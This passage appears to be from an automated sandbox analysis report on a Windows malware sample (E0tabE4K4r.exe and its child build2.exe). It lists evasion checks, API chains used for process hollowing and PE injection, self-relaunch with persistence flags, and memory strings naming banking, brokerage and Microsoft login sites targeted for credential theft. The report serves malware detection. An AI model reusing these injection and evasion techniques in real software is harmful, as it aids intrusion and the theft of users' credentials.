          Source: C:\Users\user\Desktop\E0tabE4K4r.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-39656
          Source: C:\Users\user\Desktop\E0tabE4K4r.exe TID: 7960Thread sleep time: -700000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe TID: 7404Thread sleep count: 158 > 30
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00410160
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0040F730
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0040FB98
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,6_2_0040F730
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,6_2_00410160
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,6_2_0040FB98
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeThread delayed: delay time: 700000Jump to behavior
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
          Source: E0tabE4K4r.exe, 0000000D.00000002.2488321167.000000000064A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696503903o
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
          Source: E0tabE4K4r.exe, 00000006.00000003.1535606988.00000000035A2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
          Source: build2.exe, 0000000F.00000002.2489003715.0000000000708000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696503903x
          Source: E0tabE4K4r.exe, 00000002.00000002.1251028778.0000000000688000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000002.00000003.1246963846.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000002.00000002.1251028778.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000002.00000003.1247643664.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000002.1932442705.00000000007A3000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1931541132.00000000007A3000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 0000000D.00000002.2488321167.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2489003715.0000000000777000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000011.00000002.1407064334.0000000000814000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000011.00000003.1404962377.0000000000814000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696503903
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696503903
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696503903
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696503903
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696503903t
          Source: build2.exe, 0000000F.00000002.2489003715.0000000000708000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareBZ
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
          Source: E0tabE4K4r.exe, 0000000D.00000003.1531172932.0000000003570000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
          Source: E0tabE4K4r.exe, 00000002.00000002.1251028778.00000000006CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
          Source: E0tabE4K4r.exe, 00000002.00000002.1251028778.0000000000740000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
          Source: E0tabE4K4r.exe, 00000011.00000002.1407064334.0000000000788000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696503903t
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696503903s
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
          Source: E0tabE4K4r.exe, 00000006.00000003.1535606988.00000000035A2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware20,1
          Source: E0tabE4K4r.exe, 00000006.00000002.1932442705.00000000007A3000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1931541132.00000000007A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP(t}
          Source: build2.exe, 0000000F.00000002.2489003715.0000000000708000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
          Source: E0tabE4K4r.exe, 00000006.00000002.1932298483.0000000000718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696503903j
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696503903f
          Source: build2.exe, 0000000F.00000003.2437438936.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeAPI call chain: ExitProcess graph end nodegraph_0-48860
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeAPI call chain: ExitProcess graph end nodegraph_2-39658
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0210B71C rdtsc 0_2_0210B71C
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_00401136 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401136
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_0042A57A
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,6_2_00481920
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_00412A43 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00412A43
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0210A0A3 push dword ptr fs:[00000030h]0_2_0210A0A3
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_02270042 push dword ptr fs:[00000030h]0_2_02270042
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_021910A3 push dword ptr fs:[00000030h]5_2_021910A3
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_02230042 push dword ptr fs:[00000030h]5_2_02230042
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004278D5 GetProcessHeap,2_2_004278D5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_00401136 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401136
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0040AA42 SetUnhandledExceptionFilter,0_2_0040AA42
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_00402C7E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00402C7E
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0041A562 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041A562
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004329EC
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004329BB SetUnhandledExceptionFilter,2_2_004329BB
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_004329EC
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_004329BB SetUnhandledExceptionFilter,6_2_004329BB

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Contains functionality to inject code into remote processes
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_02270110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_02270110
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeMemory written: C:\Users\user\Desktop\E0tabE4K4r.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeMemory written: C:\Users\user\Desktop\E0tabE4K4r.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeMemory written: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeMemory written: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeMemory written: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeMemory written: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeProcess created: C:\Users\user\Desktop\E0tabE4K4r.exe C:\Users\user\Desktop\E0tabE4K4r.exeJump to behavior
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeProcess created: C:\Users\user\Desktop\E0tabE4K4r.exe "C:\Users\user\Desktop\E0tabE4K4r.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeProcess created: C:\Users\user\Desktop\E0tabE4K4r.exe "C:\Users\user\Desktop\E0tabE4K4r.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeProcess created: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe "C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeProcess created: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe --TaskJump to behavior
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeProcess created: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe "C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe"
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeProcess created: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe "C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeProcess created: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe "C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe" --AutoStart
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_022980F6 cpuid 0_2_022980F6
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,0_2_00414030
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,0_2_0041583D
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_0041A8C9
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_004158B1
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,0_2_004128B5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: GetLocaleInfoA,0_2_0041A906
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_00415A83
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _strlen,EnumSystemLocalesA,0_2_00415B47
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00415B70
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,0_2_00413B12
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00415BD7
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00413471
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,0_2_00415C13
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,0_2_00413D6A
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,0_2_0041568E
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,0_2_0041A756
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: GetLocaleInfoA,0_2_0041B763
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: GetLocaleInfoW,0_2_0041A73D
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,0_2_0041A78A
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_004157A5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_022B0AB6
